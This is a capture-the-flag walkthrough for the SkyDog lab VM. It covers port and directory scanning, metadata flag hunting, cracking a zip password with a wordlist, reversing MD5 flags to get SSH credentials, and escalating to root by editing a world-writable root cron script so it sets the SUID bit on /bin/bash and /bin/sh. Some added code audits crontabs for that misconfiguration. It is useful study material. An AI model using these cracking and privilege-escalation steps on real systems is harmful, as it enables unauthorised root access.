Penetration Testing Practice - SkyDog

Information gathering

Information gathering with nmap

┌──(root㉿kali)-[~]
└─# nmap -A 10.21.77.165                           
Starting Nmap 7.95 ( https://nmap ) at 2025-09-11 21:09 EDT
Nmap scan report for 10.21.77.165
Host is up (0.072s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 c8:f7:5b:33:8a:5a:0c:03:bb:6b:af:2d:a9:70:d3:01 (DSA)
|   2048 01:9f:dd:98:ba:be:de:22:4a:48:4b:be:8d:1a:47:f4 (RSA)
|   256 f8:a9:65:a5:7c:50:1d:fd:71:57:92:38:8b:ee:8c:0a (ECDSA)
|_  256 1d:eb:57:4a:b6:23:66:f0:e7:d5:bb:8d:1e:d7:de:23 (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 252 disallowed entries (15 shown)
| /search /sdch /groups /catalogs /catalogues /news /nwshp 
| /setnewsprefs? /index.html? /? /?hl=*& /?hl=*&*&gws_rd=ssl 
|_/addurl/image? /mail/ /pagead/
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.7 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.95%E=4%D=9/11%OT=22%CT=1%CU=40955%PV=Y%DS=2%DC=T%G=Y%TM=68C372E
OS:D%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10B%TI=Z%CI=I%TS=8)SEQ(SP=1
OS:06%GCD=1%ISR=108%TI=Z%CI=I%TS=8)SEQ(SP=107%GCD=1%ISR=109%TI=Z%CI=I%TS=8)
OS:SEQ(SP=109%GCD=1%ISR=10A%TI=Z%CI=I%TS=8)SEQ(SP=FE%GCD=1%ISR=109%TI=Z%CI=
OS:I%TS=8)OPS(O1=M51DST11NW7%O2=M51DST11NW7%O3=M51DNNT11NW7%O4=M51DST11NW7%
OS:O5=M51DST11NW7%O6=M51DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W
OS:6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M51DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=
OS:O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD
OS:=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0
OS:%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=
OS:G%RIPCK=G%RUCK=G%RUD=G)IE(R=N)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 443/tcp)
HOP RTT      ADDRESS
1   83.06 ms 10.132.0.1
2   84.35 ms 10.21.77.165

The target exposes only two ports: 22 (ssh) and 80 (web).

Let's first see what useful information the web service offers.

Web service information gathering

Visiting the site shows nothing but an image.

Save it locally and use exiftool to inspect the image for hidden metadata.

┌──(root㉿kali)-[~]
└─# exiftool /home/kali/Desktop/SkyDogCon_CTF.jpg 
ExifTool Version Number         : 13.10
File Name                       : SkyDogCon_CTF.jpg
Directory                       : /home/kali/Desktop
File Size                       : 85 kB
File Modification Date/Time     : 2025:09:11 21:12:02-04:00
File Access Date/Time           : 2025:09:11 21:12:02-04:00
File Inode Change Date/Time     : 2025:09:11 21:12:02-04:00
File Permissions                : -rw-rw-r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : inches
X Resolution                    : 96
Y Resolution                    : 96
Exif Byte Order                 : Big-endian (Motorola, MM)
Software                        : Adobe ImageReady
Pixel Units                     : 1
Pixels Per Unit X               : 11811
Pixels Per Unit Y               : 11811
XP Comment                      : flag{abc40a2d4e023b42bd1ff04891549ae2}
Padding                         : (Binary data 2060 bytes, use -b option to extract)
Image Width                     : 900
Image Height                    : 525
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 900x525
Megapixels                      : 0.472

That gives the first flag: flag{abc40a2d4e023b42bd1ff04891549ae2}

No other leads for now, so let's run dirsearch and see whether anything interesting turns up.

┌──(root㉿kali)-[~]
└─# dirsearch -u 10.21.77.165
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3                                                                                                                    
 (_||| _) (/_(_|| (_| )                                                                                                                             
                                                                                                                                                    
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/reports/_10.21.77.165/_25-09-11_21-14-10.txt

Target: http://10.21.77.165/

[21:14:10] Starting:                                                                                                                                
[21:14:16] 403 -  290B  - /.ht_wsr.txt                                      
[21:14:16] 403 -  295B  - /.htaccess.sample                                 
[21:14:16] 403 -  293B  - /.htaccess.orig                                   
[21:14:16] 403 -  293B  - /.htaccess.bak1
[21:14:16] 403 -  294B  - /.htaccess_extra                                  
[21:14:16] 403 -  293B  - /.htaccess_orig
[21:14:16] 403 -  293B  - /.htaccess.save
[21:14:16] 403 -  291B  - /.htaccessBAK
[21:14:16] 403 -  291B  - /.htaccess_sc
[21:14:16] 403 -  291B  - /.htaccessOLD
[21:14:16] 403 -  292B  - /.htaccessOLD2
[21:14:16] 403 -  283B  - /.htm                                             
[21:14:16] 403 -  284B  - /.html
[21:14:16] 403 -  290B  - /.httr-oauth
[21:14:16] 403 -  293B  - /.htpasswd_test                                   
[21:14:16] 403 -  289B  - /.htpasswds                                       
[21:14:17] 403 -  283B  - /.php                                             
[21:14:17] 403 -  284B  - /.php3                                            
[21:14:52] 200 -    2KB - /robots.txt                                       
[21:14:53] 403 -  293B  - /server-status/                                   
[21:14:53] 403 -  292B  - /server-status 

?! robots.txt returns 200! Open it directly.

That gives the second flag: flag{cd4f10fcba234f0e8b2f60a490c306e6}

Testing the URLs

robots.txt lists a large number of directories. We use a Python script to parse robots.txt and test every URL it defines. The script first:

import requests
from urllib.parse import urljoin
import argparse

def test_robots_urls(target_url, user_agent="*"):
    """
    Test whether the Disallow and Allow URLs in the target site's robots.txt are reachable.
    Only reachable URLs are listed; unreachable ones are merely counted.

    Args:
        target_url (str): base URL of the target site (e.g., https://example).
        user_agent (str): User-Agent group to test; defaults to '*'.
    """

    # 1. Fetch robots.txt
    robots_url = urljoin(target_url, '/robots.txt')
    try:
        response = requests.get(robots_url, timeout=10)
        response.raise_for_status()
    except requests.RequestException as e:
        print(f"[!] 无法获取robots.txt: {e}")
        return

    print(f"[+] 成功获取 {robots_url}")
    print("=" * 50)

    # 2. Collect every Disallow and Allow path in the matching User-agent group
    disallowed_paths = []
    allowed_paths = []
    current_ua = None

    for line in response.text.splitlines():
        line = line.strip()

        if line.lower().startswith('user-agent:'):
            current_ua = line.split(':', 1)[1].strip()
        elif current_ua == user_agent:
            if line.lower().startswith('disallow:'):
                path = line.split(':', 1)[1].strip()
                if path and not path.startswith('#'):
                    disallowed_paths.append(path)
            elif line.lower().startswith('allow:'):
                path = line.split(':', 1)[1].strip()
                if path and not path.startswith('#'):
                    allowed_paths.append(path)

    print(f"[+] 为User-Agent '{user_agent}' 找到:")
    print(f"  - Disallow规则: {len(disallowed_paths)} 个")
    print(f"  - Allow规则: {len(allowed_paths)} 个")

    # 3. Request every path (Disallow + Allow).
    #    Note: rules are sent verbatim, so wildcard rules such as /?hl=*& or /foo$
    #    go out as literal URLs; a 200 on those usually just means the server ignores
    #    an unknown query string, not that a real resource exists there.
    session = requests.Session()
    accessible_urls = []
    blocked_count = 0
    not_found_count = 0
    other_status_count = 0
    error_count = 0

    all_paths = disallowed_paths + allowed_paths

    for path in all_paths:
        test_url = urljoin(target_url, path)

        try:
            resp = session.get(test_url, timeout=8, allow_redirects=True)

            if resp.status_code == 200:
                accessible_urls.append(test_url)
            elif resp.status_code == 403:
                blocked_count += 1
            elif resp.status_code == 404:
                not_found_count += 1
            else:
                other_status_count += 1

        except requests.RequestException:
            error_count += 1

    # 4. Report results
    print("\n[+] 可访问的URL列表:")
    for url in accessible_urls:
        print(f"  - {url}")

    print("\n[+] 访问统计:")
    print(f"  - 可访问: {len(accessible_urls)}")
    print(f"  - 被禁止 (403): {blocked_count}")
    print(f"  - 不存在 (404): {not_found_count}")
    print(f"  - 其他状态码: {other_status_count}")
    print(f"  - 请求错误: {error_count}")

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="测试robots.txt中Disallow和Allow的URL访问权限。")
    parser.add_argument("url", help="目标网站的基础URL (e.g., https://example)")
    parser.add_argument("-a", "--user-agent", default="*", help="要测试的User-Agent规则 (默认: *)")
    args = parser.parse_args()

    test_robots_urls(args.url, args.user_agent)

Run it

┌──(root㉿kali)-[~]
└─# python robotoo.py http://10.21.77.165
[+] 成功获取 http://10.21.77.165/robots.txt
==================================================
[+] 为User-Agent '*' 找到:
  - Disallow规则: 252 个
  - Allow规则: 47 个

[+] 可访问的URL列表:
  - http://10.21.77.165/index.html
  - http://10.21.77.165/
  - http://10.21.77.165/?hl=*&
  - http://10.21.77.165/?hl=*&*&gws_rd=ssl
  - http://10.21.77.165/?hl=
  - http://10.21.77.165/?hl=*&gws_rd=ssl$
  - http://10.21.77.165/?gws_rd=ssl$
  - http://10.21.77.165/?pt1=true$
  - http://10.21.77.165/Setec/

[+] 访问统计:
  - 可访问: 9
  - 被禁止 (403): 0
  - 不存在 (404): 290
  - 其他状态码: 0
  - 请求错误: 0
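Most of the "accessible" hits above are wildcard rules (`/?hl=*&`, `/?gws_rd=ssl$`) requested as literal URLs, which the server answers with its index page; the one real lead is the plain path `/Setec/`. The following is an added example, not part of the original writeup, that parses a robots.txt offline and separates plain paths (worth requesting as-is) from wildcard rules (which are compiled to regexes so they can be matched against URLs instead of being fetched verbatim). The robots.txt content and the function names are constructed for this example.

```python
import re
from dataclasses import dataclass, field

# Constructed sample robots.txt, modelled on the kind of rules seen in the scan above.
SAMPLE_ROBOTS = """\
# constructed example, not the target's real robots.txt
User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /?hl=*&
Disallow: /?gws_rd=ssl$
Disallow: /Setec/
Allow: /index.html
Disallow: /search   # duplicate on purpose

User-agent: Googlebot
Disallow: /private/
"""


@dataclass
class RobotsRules:
    literal: list = field(default_factory=list)   # plain paths, safe to request as-is
    patterns: list = field(default_factory=list)  # (original rule, compiled regex)


def rule_to_regex(rule: str) -> re.Pattern:
    """Translate one robots.txt path rule into a regex.

    '*' matches any run of characters, a trailing '$' anchors the end of the URL,
    everything else is matched literally (escaped). Rules are implicitly
    anchored at the start of the path, as in the robots.txt convention."""
    anchored = rule.endswith("$")
    body = rule[:-1] if anchored else rule
    parts = [re.escape(p) for p in body.split("*")]
    return re.compile("^" + ".*".join(parts) + ("$" if anchored else ""))


def parse_robots(text: str, user_agent: str = "*") -> RobotsRules:
    """Collect the Disallow/Allow rules of one User-agent group, deduplicated,
    and split them into literal paths and wildcard patterns."""
    rules = RobotsRules()
    seen = set()
    applies = False
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments, including trailing ones
        if not line or ":" not in line:
            continue
        key, value = (s.strip() for s in line.split(":", 1))
        key = key.lower()
        if key == "user-agent":
            applies = (value == user_agent)
            continue
        if not applies or key not in ("disallow", "allow") or not value:
            continue
        if value in seen:
            continue
        seen.add(value)
        if "*" in value or value.endswith("$"):
            rules.patterns.append((value, rule_to_regex(value)))
        else:
            rules.literal.append(value)
    return rules


def matching_rules(rules: RobotsRules, path: str) -> list:
    """Return the wildcard rules that cover a given request path."""
    return [rule for rule, rx in rules.patterns if rx.search(path)]


if __name__ == "__main__":
    r = parse_robots(SAMPLE_ROBOTS)
    print("literal paths to request:", r.literal)
    print("wildcard rules (match, don't fetch):", [rule for rule, _ in r.patterns])
    print("/?hl=en&x is covered by:", matching_rules(r, "/?hl=en&x"))
```

Feeding the literal list to the request loop, and keeping the pattern list only for classifying URLs already discovered, removes the false positives the verbatim run produced and cuts the request count accordingly.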

We find a /Setec directory; visiting it shows another image. Let's check its metadata as well.

┌──(root㉿kali)-[~]
└─# exiftool /home/kali/Desktop/Setec_Astronomy.jpg 
ExifTool Version Number         : 13.10
File Name                       : Setec_Astronomy.jpg
Directory                       : /home/kali/Desktop
File Size                       : 171 kB
File Modification Date/Time     : 2025:09:11 21:36:40-04:00
File Access Date/Time           : 2025:09:11 21:36:40-04:00
File Inode Change Date/Time     : 2025:09:11 21:36:40-04:00
File Permissions                : -rw-rw-r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : cm
X Resolution                    : 37
Y Resolution                    : 37
Profile CMM Type                : Linotronic
Profile Version                 : 2.1.0
Profile Class                   : Display Device Profile
Color Space Data                : RGB
Profile Connection Space        : XYZ
Profile Date Time               : 1998:02:09 06:49:00
Profile File Signature          : acsp
Primary Platform                : Microsoft Corporation
CMM Flags                       : Not Embedded, Independent
Device Manufacturer             : Hewlett-Packard
Device Model                    : sRGB
Device Attributes               : Reflective, Glossy, Positive, Color
Rendering Intent                : Media-Relative Colorimetric
Connection Space Illuminant     : 0.9642 1 0.82491
Profile Creator                 : Hewlett-Packard
Profile ID                      : 0
Profile Copyright               : Copyright (c) 1998 Hewlett-Packard Company
Profile Description             : sRGB IEC61966-2.1
Media White Point               : 0.95045 1 1.08905
Media Black Point               : 0 0 0
Red Matrix Column               : 0.43607 0.22249 0.01392
Green Matrix Column             : 0.38515 0.71687 0.09708
Blue Matrix Column              : 0.14307 0.06061 0.7141
Device Mfg Desc                 : IEC http://www.iec.ch
Device Model Desc               : IEC 61966-2.1 Default RGB colour space - sRGB
Viewing Cond Desc               : Reference Viewing Condition in IEC61966-2.1
Viewing Cond Illuminant         : 19.6445 20.3718 16.8089
Viewing Cond Surround           : 3.92889 4.07439 3.36179
Viewing Cond Illuminant Type    : D50
Luminance                       : 76.03647 80 87.12462
Measurement Observer            : CIE 1931
Measurement Backing             : 0 0 0
Measurement Geometry            : Unknown
Measurement Flare               : 0.999%
Measurement Illuminant          : D65
Technology                      : Cathode Ray Tube Display
Red Tone Reproduction Curve     : (Binary data 2060 bytes, use -b option to extract)
Green Tone Reproduction Curve   : (Binary data 2060 bytes, use -b option to extract)
Blue Tone Reproduction Curve    : (Binary data 2060 bytes, use -b option to extract)
Image Width                     : 1024
Image Height                    : 768
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:4:4 (1 1)
Image Size                      : 1024x768
Megapixels                      : 0.786

OK, nothing useful there. Let's look at the page source instead.

It reveals another directory, Astronomy. Open it directly.

It contains the same image as before plus a zip archive. Download the zip and try to extract it; extraction asks for a password, so we crack it with fcrackzip.

┌──(root㉿kali)-[/home/kali/Desktop]
└─# unzip Whistler.zip                             
Archive:  Whistler.zip
[Whistler.zip] flag.txt password: 
password incorrect--reenter: 
password incorrect--reenter: 
   skipping: flag.txt                incorrect password
   skipping: QuesttoFindCosmo.txt    incorrect password
┌──(root㉿kali)-[~]
└─# fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u /home/kali/Desktop/Whistler.zip -v
found file 'flag.txt', (size cp/uc     50/    38, flags 9, chk 874a)
found file 'QuesttoFindCosmo.txt', (size cp/uc     72/    61, flags 9, chk 83b5)

PASSWORD FOUND!!!!: pw == yourmother

(The author's password choice is something else...)

With the password in hand, extract the archive and grab the flag.

┌──(root㉿kali)-[/home/kali/Desktop]
└─# unzip Whistler.zip 
Archive:  Whistler.zip
[Whistler.zip] flag.txt password: 
 extracting: flag.txt                
  inflating: QuesttoFindCosmo.txt 
┌──(root㉿kali)-[/home/kali/Desktop]
└─# cat flag.txt         
flag{1871a3c1da602bf471d3d76cc60cdb9b}
┌──(root㉿kali)-[/home/kali/Desktop]
└─# cat QuesttoFindCosmo.txt 
Time to break out those binoculars and start doing some OSINT 

That gives the third flag: flag{1871a3c1da602bf471d3d76cc60cdb9b}, along with a hint: OSINT (open-source intelligence).

OSINT

No idea where to go next; the information gathered so far doesn't seem to be enough. Going back to the page source of /Setec/, we find some hints.

NSA-Agent-Abbott: NSA agent Abbott. A series of searches turns up the film Sneakers. Under this character's quote, another character named Whistler is mentioned, as is a character named Cosmo. The image on the /Setec/ page contains the text "too many secrets", which is an anagram of "Setec Astronomy" from Sneakers. So the relevant information has to be collected from the film's script and related media, especially the actor James Earl Jones.

The author's train of thought here is quite something; don't dwell on it. The answer is the /PlayTronics/ directory. Open it directly.

It contains a packet capture and a flag.txt; download both files.

That gives the fourth flag: flag{c07908a705c22922e6d416e0e1107d99}

Wireshark traffic analysis

Open companytraffic.pcap in Wireshark. The capture contains a lot of HTTPS traffic to SoundCloud and DNS lookups for the domains hosting the related assets. At the end of the pcap is an HTTP request that downloads an MP3 file, sent from IP 54.239.172.25 to IP 192.168.2.223. Save the MP3 as follows: File --> Export Objects --> HTTP --> Save.

Then it's listening time (it is genuinely hard to make out what is being said). Combined with the film line "Hi. My Name Is Werner Brandes. My Voice Is My Passport. Verify Me." this gives us the username wernerbrandes, but no password.

MD5 lookup

We have a username but no password, and brute-forcing the SSH password gets nowhere. Going back over everything gathered so far, the flags look like MD5 hashes, so let's try reversing the flags found earlier.

Using an online lookup tool, the four flags resolve to: Welcome Home, Bots, yourmother, leroybrown.
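The online lookup works only because the flags are unsalted MD5 digests of short dictionary words, which a precomputed table resolves instantly. As an added example, not part of the original writeup, the following verifies that observation offline: it pulls the 32-hex digests out of flag{...} wrappers and checks them against a candidate word list, trying a few spelling variants so the reversal does not miss a hash computed over a lowercased or space-stripped form. The flag strings and candidate words come from the page; everything else (function names, the variant set) is constructed for this example.

```python
import hashlib
import re

# Flags recovered in the writeup (values taken from the page).
FLAGS_FROM_PAGE = [
    "flag{abc40a2d4e023b42bd1ff04891549ae2}",
    "flag{cd4f10fcba234f0e8b2f60a490c306e6}",
    "flag{1871a3c1da602bf471d3d76cc60cdb9b}",
    "flag{c07908a705c22922e6d416e0e1107d99}",
]

# Plaintexts the writeup reports from its online lookup (also from the page).
CANDIDATES_FROM_PAGE = ["Welcome Home", "Bots", "yourmother", "leroybrown"]

FLAG_RE = re.compile(r"flag\{([0-9a-fA-F]{32})\}")


def md5_hex(s: str) -> str:
    """Unsalted MD5 of a UTF-8 string, lowercase hex."""
    return hashlib.md5(s.encode("utf-8")).hexdigest()


def extract_md5_digests(text: str) -> list:
    """Return the lowercase 32-hex digests found inside flag{...} wrappers, in order."""
    return [m.lower() for m in FLAG_RE.findall(text)]


def spelling_variants(word: str) -> set:
    """Forms a CTF author might have hashed: as given, lowercased,
    without spaces, and with a trailing newline (echo without -n)."""
    compact = word.replace(" ", "")
    return {word, word.lower(), compact, compact.lower(), word + "\n"}


def match_digests(digests: list, candidates: list) -> dict:
    """Map each digest to the candidate form that hashes to it, or None.

    Builds a small digest -> plaintext table from the candidates first, so each
    digest is a dictionary lookup rather than a loop over candidates."""
    table = {}
    for word in candidates:
        for form in spelling_variants(word):
            table.setdefault(md5_hex(form), form)
    return {d: table.get(d) for d in digests}


if __name__ == "__main__":
    digests = extract_md5_digests("\n".join(FLAGS_FROM_PAGE))
    for digest, plain in match_digests(digests, CANDIDATES_FROM_PAGE).items():
        print(digest, "->", repr(plain) if plain else "no match in candidate list")
```

The same function doubles as a quick check that a hash you are asked to treat as secret (a flag, an API token stored "hashed") is not just an unsalted digest of a guessable word; if it resolves from a short list, it offers no protection.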

GetShell

SSH login

Try the recovered strings in turn as the password for user wernerbrandes; the working credentials turn out to be wernerbrandes:leroybrown.

┌──(root㉿kali)-[~]
└─# ssh wernerbrandes@10.21.77.165
wernerbrandes@10.21.77.165's password: 
Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 3.19.0-25-generic x86_64)

 * Documentation:  https://help.ubuntu/

  System information as of Thu Sep 11 21:08:02 EDT 2025

  System load:  0.0               Processes:           122
  Usage of /:   7.3% of 17.34GB   Users logged in:     0
  Memory usage: 4%                IP address for eth0: 10.21.77.165
  Swap usage:   0%

  Graph this data and manage this system at:
    https://landscape.canonical/

30 packages can be updated.
21 updates are security updates.

Last login: Fri Oct 30 19:08:28 2015 from 10.0.2.5
wernerbrandes@skydogctf:~$ ls
flag.txt
wernerbrandes@skydogctf:~$ cat flag.txt
flag{82ce8d8f5745ff6849fa7af1473c9b35}wernerbrandes@skydogctf:~$ 

That gives the fifth flag: flag{82ce8d8f5745ff6849fa7af1473c9b35}; its MD5 lookup resolves to Dr. Gunter Janek.

Privilege escalation

Privilege escalation enumeration

First use find to search for world-writable files. There is a /lib/log/sanitizer.py script; check its permissions and contents.
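The root cause here is a root-executed cron script that any local user can edit (mode -rwxrwxrwx). The page finds it by hand with find -perm -0002; the following is an added example, not part of the original writeup, of the defender's side of that check: it reads crontab entries, pulls out the absolute paths each command references, and reports any regular file that is world-writable, or that sits in a world-writable directory without the sticky bit (either lets an unprivileged user replace what root will run). The crontab line, the temporary script and the function names are constructed for this example; the demo creates a stand-in for /lib/log/sanitizer.py in a temporary directory rather than touching the real path.

```python
import os
import re
import stat
import tempfile

# Absolute paths inside a shell command (stops at whitespace and shell metacharacters).
PATH_RE = re.compile(r"(?:^|\s)(/[^\s;&|><]+)")


def commands_from_crontab(text: str, system_crontab: bool = True):
    """Yield (user, command) for each job line.

    System crontabs (/etc/crontab, /etc/cron.d/*) carry a user field after the
    five time fields (or after an @reboot-style shortcut); per-user crontabs do not."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue                      # blank, comment, or VAR=value assignment
        n_time = 1 if line.startswith("@") else 5
        n = n_time + (1 if system_crontab else 0)
        parts = line.split(None, n)
        if len(parts) <= n:
            continue                      # malformed line, nothing to run
        user = parts[n_time] if system_crontab else None
        yield user, parts[n]


def referenced_paths(command: str) -> list:
    return PATH_RE.findall(command)


def world_writable_issues(path: str) -> list:
    """Findings for one path: world-writable regular file, or an ancestor
    directory that is world-writable without the sticky bit."""
    findings = []
    try:
        st = os.stat(path)
    except OSError:
        return findings                   # path does not exist on this host
    if not stat.S_ISREG(st.st_mode):
        return findings                   # skip devices such as /dev/null
    if st.st_mode & stat.S_IWOTH:
        findings.append(f"{path}: world-writable (mode {oct(st.st_mode & 0o777)})")
    d = os.path.dirname(path)
    while d and d != os.path.dirname(d):  # walk up, stop before "/"
        dst = os.stat(d)
        if dst.st_mode & stat.S_IWOTH and not dst.st_mode & stat.S_ISVTX:
            findings.append(f"{d}: parent directory world-writable without sticky bit")
        d = os.path.dirname(d)
    return findings


def audit_crontab(text: str, system_crontab: bool = True) -> list:
    """Return (user, command, finding) triples for every risky path a job references."""
    report = []
    for user, cmd in commands_from_crontab(text, system_crontab):
        for p in referenced_paths(cmd):
            for f in world_writable_issues(p):
                report.append((user, cmd, f))
    return report


def demo():
    """Construct a world-writable stand-in for the page's sanitizer.py, audit a
    crontab line that runs it as root, then apply the fix and audit again."""
    tmp = tempfile.mkdtemp()
    script = os.path.join(tmp, "sanitizer.py")
    with open(script, "w") as fh:
        fh.write("import os\nos.system('rm -r /tmp/*')\n")   # constructed content
    os.chmod(script, 0o777)                                    # the misconfiguration
    crontab = f"*/5 * * * * root /usr/bin/python {script} > /dev/null 2>&1\n"
    before = audit_crontab(crontab)
    os.chmod(script, 0o755)                                    # root-owned, no group/other write
    after = audit_crontab(crontab)
    return script, before, after


if __name__ == "__main__":
    script, before, after = demo()
    print("before fix:", [f for _, _, f in before])
    print("after fix: ", [f for _, _, f in after])
```

On a real host, feed it /etc/crontab and each file under /etc/cron.d (system_crontab=True) and the output of crontab -l for root (system_crontab=False); the same ownership check should be extended to the interpreter the job calls, since a writable /usr/bin/python would be just as bad.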

Escalating to root

Since the script runs as root, we modify it to set the SUID bit on the /bin/bash and /bin/sh binaries. The modified script:

wernerbrandes@skydogctf:~$ vim /lib/log/sanitizer.py 
wernerbrandes@skydogctf:~$ cat /lib/log/sanitizer.py 
#!/usr/bin/env python
import os
import sys
try:
     os.system('rm -r /tmp/* ')
     os.system('chmod u+s /bin/bash')
     os.system('chmod u+s /bin/sh')
except:
     sys.exit()

After a few minutes the execute bit on /bin/sh has changed from x to s.

bash-4.3$ /bin/sh
# pwd
/
# whoami
root
# ls
bin  boot  dev  etc  home  initrd.img  lib  lib64  lost+found  media  mnt  opt  proc  root  run  sbin  srv  sys  tmp  usr  var  vmlinuz
# cd root
# ls
BlackBox
# cd BlackBox
# ls
flag.txt
# cat flag.txt
flag{b70b205c96270be6ced772112e7dd03f}

Congratulations!! Martin Bishop is a free man once again!  Go here to receive your reward.
/CongratulationsYouDidIt#

Running /bin/sh gives a root shell and the final flag: flag{b70b205c96270be6ced772112e7dd03f}

The author's easter egg

It is a movie clip. That completes the walkthrough.
